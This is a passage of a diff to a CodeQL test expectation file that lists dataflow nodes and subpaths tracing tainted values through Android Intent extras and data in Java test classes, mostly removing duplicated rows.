update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:38:13:38:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:38:37:38:75 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:38:46:38:75 | source(...) : Object | semmle.label | source(...) : Object | | TestStartBroadcastReceiverToIntent.java:39:44:39:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:39:44:39:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:39:44:39:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:43:13:43:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:43:13:43:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:43:13:43:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:43:37:43:66 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:43:46:43:66 | source(...) : Object | semmle.label | source(...) : Object | | TestStartBroadcastReceiverToIntent.java:44:37:44:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:44:37:44:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:44:37:44:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:48:13:48:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:48:13:48:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:48:13:48:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:48:37:48:74 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:48:46:48:74 | source(...) : Object | semmle.label | source(...) : Object | | TestStartBroadcastReceiverToIntent.java:49:43:49:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:49:43:49:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:49:43:49:48 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:53:13:53:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:53:13:53:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:53:13:53:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:53:37:53:74 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:53:46:53:74 | source(...) : Object | semmle.label | source(...) : Object | | TestStartBroadcastReceiverToIntent.java:54:44:54:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:54:44:54:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:54:44:54:49 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:58:13:58:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:58:13:58:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:58:13:58:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:58:37:58:82 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:58:46:58:82 | source(...) : Object | semmle.label | source(...) : Object | | TestStartBroadcastReceiverToIntent.java:59:50:59:55 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:59:50:59:55 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:59:50:59:55 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:65:13:65:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:65:13:65:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:65:13:65:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:65:37:65:60 | (...)... : String | semmle.label | (...)... : String | | TestStartBroadcastReceiverToIntent.java:65:46:65:60 | source(...) : Object | semmle.label | source(...) : Object | | TestStartBroadcastReceiverToIntent.java:66:31:66:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:66:31:66:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:66:31:66:36 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:81:48:81:60 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:81:48:81:60 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:81:48:81:60 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:82:18:82:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartBroadcastReceiverToIntent.java:82:18:82:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:82:18:82:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartBroadcastReceiverToIntent.java:82:18:82:46 | getStringExtra(...) | semmle.label | getStringExtra(...) | | TestStartServiceToIntent.java:19:13:19:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:19:13:19:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:19:13:19:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:19:37:19:59 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:19:46:19:59 | source(...) : Object | semmle.label | source(...) : Object | | TestStartServiceToIntent.java:20:29:20:34 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:20:29:20:34 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:20:29:20:34 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:24:13:24:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:24:13:24:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:24:13:24:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:24:37:24:67 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:24:46:24:67 | source(...) : Object | semmle.label | source(...) : Object | | TestStartServiceToIntent.java:25:35:25:40 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:25:35:25:40 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:25:35:25:40 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:29:37:29:68 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:29:46:29:68 | source(...) : Object | semmle.label | source(...) : Object | | TestStartServiceToIntent.java:30:37:30:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:30:37:30:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:30:37:30:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:34:13:34:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:34:13:34:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:34:13:34:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:34:37:34:60 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:34:46:34:60 | source(...) : Object | semmle.label | source(...) : Object | | TestStartServiceToIntent.java:35:30:35:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:35:30:35:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:35:30:35:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:39:13:39:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:39:13:39:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:39:13:39:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:39:37:39:71 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:39:46:39:71 | source(...) : Object | semmle.label | source(...) : Object | | TestStartServiceToIntent.java:40:40:40:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:40:40:40:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:40:40:40:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:46:13:46:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:46:13:46:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:46:13:46:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | intent [post update] : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:46:37:46:60 | (...)... : String | semmle.label | (...)... : String | | TestStartServiceToIntent.java:46:46:46:60 | source(...) : Object | semmle.label | source(...) : Object | | TestStartServiceToIntent.java:47:30:47:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:47:30:47:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:47:30:47:35 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:62:29:62:41 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:62:29:62:41 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:62:29:62:41 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:63:18:63:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:63:18:63:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:63:18:63:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:63:18:63:46 | getStringExtra(...) | semmle.label | getStringExtra(...) | | TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:67:35:67:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:68:18:68:46 | getStringExtra(...) | semmle.label | getStringExtra(...) | | TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:74:18:74:46 | getStringExtra(...) | semmle.label | getStringExtra(...) | | TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:80:18:80:46 | getStringExtra(...) | semmle.label | getStringExtra(...) | | TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:86:18:86:46 | getStringExtra(...) | semmle.label | getStringExtra(...) | | TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | -| TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | semmle.label | intent : Intent [android.content.Intent.extras, ] : String | | TestStartServiceToIntent.java:91:18:91:46 | getStringExtra(...) | semmle.label | getStringExtra(...) | subpaths | Test.java:41:65:41:72 | source(...) : String | Test.java:28:29:28:36 | k : String | Test.java:28:89:28:89 | b : Bundle [] : String | Test.java:41:45:41:73 | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:43:19:43:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:43:9:43:40 | getMapKey(...) | | Test.java:43:36:43:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:43:19:43:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:43:36:43:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:43:19:43:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:50:38:50:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:50:21:50:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:50:38:50:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | Test.java:50:21:50:41 | getIntent_extras(...) : Bundle [] : Object | | Test.java:57:17:57:19 | out : Intent [android.content.Intent.data] : Uri | Test.java:32:14:32:26 | intent : Intent [android.content.Intent.data] : Uri | Test.java:32:38:32:53 | getData(...) : Uri | Test.java:57:9:57:20 | getData(...) | | Test.java:64:17:64:19 | out : Intent [android.content.Intent.data] : Uri | Test.java:32:14:32:26 | intent : Intent [android.content.Intent.data] : Uri | Test.java:32:38:32:53 | getData(...) : Uri | Test.java:64:9:64:20 | getData(...) | | Test.java:85:38:85:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | Test.java:85:21:85:41 | getIntent_extras(...) : Bundle [] : CharSequence | -| Test.java:85:38:85:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | Test.java:85:21:85:41 | getIntent_extras(...) : Bundle [] : CharSequence | | Test.java:92:38:92:40 | out : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : IntentSender | Test.java:92:21:92:41 | getIntent_extras(...) : Bundle [] : IntentSender | -| Test.java:92:38:92:40 | out : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : IntentSender | Test.java:92:21:92:41 | getIntent_extras(...) : Bundle [] : IntentSender | -| Test.java:99:38:99:40 | out : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Intent | Test.java:99:21:99:41 | getIntent_extras(...) : Bundle [] : Intent | | Test.java:99:38:99:40 | out : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Intent | Test.java:99:21:99:41 | getIntent_extras(...) : Bundle [] : Intent | | Test.java:146:43:146:50 | source(...) : Uri | Test.java:27:28:27:35 | data : Uri | Test.java:27:47:27:71 | new Intent(...) : Intent [android.content.Intent.data] : Uri | Test.java:146:24:146:51 | newWithIntent_data(...) : Intent [android.content.Intent.data] : Uri | | Test.java:153:43:153:50 | source(...) : Uri | Test.java:27:28:27:35 | data : Uri | Test.java:27:47:27:71 | new Intent(...) : Intent [android.content.Intent.data] : Uri | Test.java:153:24:153:51 | newWithIntent_data(...) : Intent [android.content.Intent.data] : Uri | | Test.java:246:19:246:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:246:9:246:40 | getMapKey(...) | | Test.java:246:36:246:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:246:19:246:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:246:36:246:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:246:19:246:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:253:38:253:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:253:21:253:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:253:38:253:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:253:21:253:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:428:19:428:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:428:9:428:40 | getMapKey(...) | | Test.java:428:36:428:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:428:19:428:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:428:36:428:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:428:19:428:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:435:19:435:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:435:9:435:40 | getMapKey(...) | | Test.java:435:36:435:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:435:19:435:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:435:36:435:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:435:19:435:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:442:19:442:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:442:9:442:40 | getMapKey(...) | | Test.java:442:36:442:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:442:19:442:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:442:36:442:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:442:19:442:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:449:19:449:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:449:9:449:40 | getMapKey(...) | | Test.java:449:36:449:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:449:19:449:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:449:36:449:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 